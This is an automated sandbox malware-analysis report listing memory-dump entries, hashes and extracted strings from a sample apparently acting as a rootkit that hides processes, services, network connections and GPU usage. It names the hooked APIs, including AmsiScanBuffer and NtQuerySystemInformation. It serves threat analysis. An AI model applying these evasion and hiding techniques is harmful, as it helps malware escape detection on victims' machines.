        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Find$CloseFile$FirstNext
        • String ID:
        • API String ID: 1164774033-0
        • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction ID: b1b595e2bd225bfb28b897068665a27220f512ebfbfefbd470a7931d016fb42e
        • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction Fuzzy Hash: 27A1E4227047A8E9FB209BB5B44CBAD7BA1E7A1794F146217EE453F6D9CA34C4F18700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Find$CloseFile$FirstNext
        • String ID:
        • API String ID: 1164774033-0
        • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction ID: 34fab814b6c90c4726c74b21a03e5ece2bba5bff11add259d62f9b2bdc265b5f
        • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction Fuzzy Hash: 42A117227046A8E9FB20DBB5A44CBAD6BA0E771794F146217FE6D2F695CA34C4F1C300
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
        • String ID:
        • API String ID: 2933794660-0
        • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction ID: 3dfd9ff183b9b48db57b01c2c04703e1105b918b8d525c14942d64cbf3f54b05
        • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction Fuzzy Hash: E7115626714F14D9EB00CFA0E8587A833A4F729758F441F22EE5D467A4DF78C1B48340
        APIs
          • Part of subcall function 0000022123C5D220: HeapAlloc.KERNEL32(?,?,00000000,0000022123C5C987), ref: 0000022123C5D275
          • Part of subcall function 0000022123C60EB8: _invalid_parameter_noinfo.LIBCMT ref: 0000022123C60EEB
        • FindFirstFileExW.KERNEL32 ref: 0000022123C5DB99
          • Part of subcall function 0000022123C5D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000022123C5674A), ref: 0000022123C5D2B6
          • Part of subcall function 0000022123C5D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000022123C5674A), ref: 0000022123C5D2C0
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
        • String ID:
        • API String ID: 2436724071-0
        • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
        • Instruction ID: 6d9913bf456140959ef170a021a4ac59f72eb390f09e0be6a0a642fff34fc917
        • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
        • Instruction Fuzzy Hash: 4E81E3223047A4E5EB20DBA5B44CB5EA791E3A4BA0F045327FE992B7D5DF38C0B18700
        APIs
          • Part of subcall function 0000022123C2D220: HeapAlloc.KERNEL32(?,?,00000000,0000022123C2C987), ref: 0000022123C2D275
          • Part of subcall function 0000022123C30EB8: _invalid_parameter_noinfo.LIBCMT ref: 0000022123C30EEB
        • FindFirstFileExW.KERNEL32 ref: 0000022123C2DB99
          • Part of subcall function 0000022123C2D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000022123C2674A), ref: 0000022123C2D2B6
          • Part of subcall function 0000022123C2D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000022123C2674A), ref: 0000022123C2D2C0
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
        • String ID:
        • API String ID: 2436724071-0
        • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
        • Instruction ID: 59d1e35df3c4169da7f2d11e1948799ba33f3385bc0af39e4cfe7e27fe5f045f
        • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
        • Instruction Fuzzy Hash: 7381E8223047A4E5EB20DBA6A45CB5EA791E774790F145317BEBD0B795DE38C4B18700
        Memory Dump Source
        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction ID: 21f9d6cf62bb6e2c44083fd29e4b0049b085507b04aab111736da0d490e0a311
        • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction Fuzzy Hash: 10B1EA356206B0E3EB79AFA5D418BA963A4F764B84F106216FE095F794DF36CC60C780
        Memory Dump Source
        • Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction ID: 6cd62003fccc2fc9e927c8edb48320134716b0ab66f84c5580882ae44c2bbf7e
        • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction Fuzzy Hash: 6AB1E1226206A0EAEF79EFA5D458B9963A4F764F84F005626FE095F794DF34CC60C740
        Memory Dump Source
        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
        • Instruction ID: 54cb2694a25d265f049f54e97fc06e126f0fb209f1e7c64dd22748ce6d71880d
        • Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
        • Instruction Fuzzy Hash: ABA13E227046A0E7FB30FFB5D448BAD6BA0E751B94F146216FD491FB99DA35C4A1C700
        Memory Dump Source
        • Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
        • Instruction ID: 004a697452b2d0edf61e2ba6f4bfba6f55c91c2e4ec45db5e3508326936af024
        • Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
        • Instruction Fuzzy Hash: CEA15E227006A1EDFB30EFF5D458BAD6BA0E361B95F144616FD992F6A5DA38C463C300
        Memory Dump Source
        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID: _invalid_parameter_noinfo
        • String ID:
        • API String ID: 3215553584-0
        • Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
        • Instruction ID: b00d0d2af54d559108ec1112037bd6c6882dd20b225c40f1706a0f943773945a
        • Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
        • Instruction Fuzzy Hash: 1A81FC323046A0E7EB30EFA1A444B5EA791E795B95F045325FE9D4BB95DF39C0A1C700
        Memory Dump Source
        • Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd
        Similarity
        • API ID: _invalid_parameter_noinfo
        • String ID:
        • API String ID: 3215553584-0
        • Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
        • Instruction ID: c744a767a516ebd6248d4df4e6b383818bd4eb135b6c85eca5ebe6eab7eaa263
        • Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
        • Instruction Fuzzy Hash: 3F81FA32300660E9EB30EFA1A458B9E6791E3B5B91F044B25FE9D4B7A5DF38C0638700
        Memory Dump Source
        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
        • Instruction ID: ec18ff5b12516f3a03b1385d03db2a374f41db27e1386f22320c00a4fcdd7e1e
        • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
        • Instruction Fuzzy Hash: 921169B16245E8D6F7A98F69945972977D0E315384F40521AEC898EB98C73DC4F15F00

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
        • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
        • API String ID: 2135414181-3414887735
        • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction ID: 0ca92fbbf1778aabb2b847d9b972d7a044a09208d2cc7ef89be218993f5c622d
        • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction Fuzzy Hash: 06714336310E68D9EB109FA6E858A9D2364FBE4B88F406213EE4D5B758DF34C4B5D740

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
        • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
        • API String ID: 2135414181-3414887735
        • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction ID: 856824a6bdfbc25d9a4fb2d4b4d30d9a1fe39f44cc48671294289c762c82e5de
        • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction Fuzzy Hash: 3E713036310A68E5EB109FA6E898A9D2364FBA4B88F406213FD4D5B728DF35C5B5C340

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
        • API String ID: 1735320900-4225371247
        • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction ID: 58123b38155f9b244377e9b86cdc6b4ab3ddc16cae1c5cf0585c3fef8d008fee
        • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction Fuzzy Hash: 8C517060520A6EF5EB40EBE4EC49FD83720E760754F80A713BD491B665DE7982FAC380

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
        • String ID: d
        • API String ID: 2005889112-2564639436
        • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction ID: 57ef5a2f26e92c7387a444d54b27659cde2b6c6aea8e6b590fca51004aa6a4db
        • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction Fuzzy Hash: CF515132200B98EAEB10CFA1E44C75A77A1F798F95F545225EE490B758DF38D0A58B00

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
        • String ID: d
        • API String ID: 2005889112-2564639436
        • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction ID: 97e77ffeb9d1e88d428ca5f5b4e114550d1ed5fd9b14859275cb2bb65874dcff
        • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction Fuzzy Hash: 1F519332600B98E6E720CFA2E44879A77A1F798F98F445225EE4D0B718DF3DC1A5C740

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
        • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
        • API String ID: 740688525-1880043860
        • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction ID: 1d69e27629401eb29d856f0f5e3ddecb0d918111c38792e697ea0280213006cd
        • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction Fuzzy Hash: A951BA2170172CE5EA159BD6A848BA52250F7A8BB0F582726FE3D5B3D0DF38D4B58640

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
        • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
        • API String ID: 740688525-1880043860
        • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction ID: 05f60aea5c4de112aa8aa0c458d90be7212996debdcbfbcd63c9ffc654b25013
        • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction Fuzzy Hash: 1551C72170076CE1EA159B96A848BA52350BB68BB0F482726FE3D4B3D0DF38C5B5C740
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Running Time
        • API String ID: 1943346504-1805530042
        • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction ID: 4315b492a89893443b53e77b8f4224017620586a13450126cff0ed5a44a5d11b
        • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction Fuzzy Hash: F031EA22600A68E7E721CF92B80CB59A7A0F7A8BC5F541326FE495B664DF38D4B58700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Running Time
        • API String ID: 1943346504-1805530042
        • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction ID: 8e915207cec2f1648864f9e869b76a25628f9480e9309c777b190082722812e6
        • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction Fuzzy Hash: DA31E822600B68E6E721CF92E80CB59B7A0F7A8BC4F445316FE4D4B624DF38C5B68340
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Utilization Percentage
        • API String ID: 1943346504-3507739905
        • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction ID: 30ee69ebc4e729d243cf92d13ba5dad74d9bfa07243b5e7bb6426f33be65792d
        • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction Fuzzy Hash: 1031B421600B59EAE711DFA2B448B5963A0F7A4F84F946226AE4A5B764DF38D4B18700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Utilization Percentage
        • API String ID: 1943346504-3507739905
        • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction ID: d1968111412f52c04050fe4b63ecc802c903567fa46490583b0ee2df9f688c95
        • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction Fuzzy Hash: AC31B421600B19EAE751EF92A848B5973A0F7A4F84F046226AE4E4B724DF38C5F68700
        APIs
        Strings
        Memory Dump Source
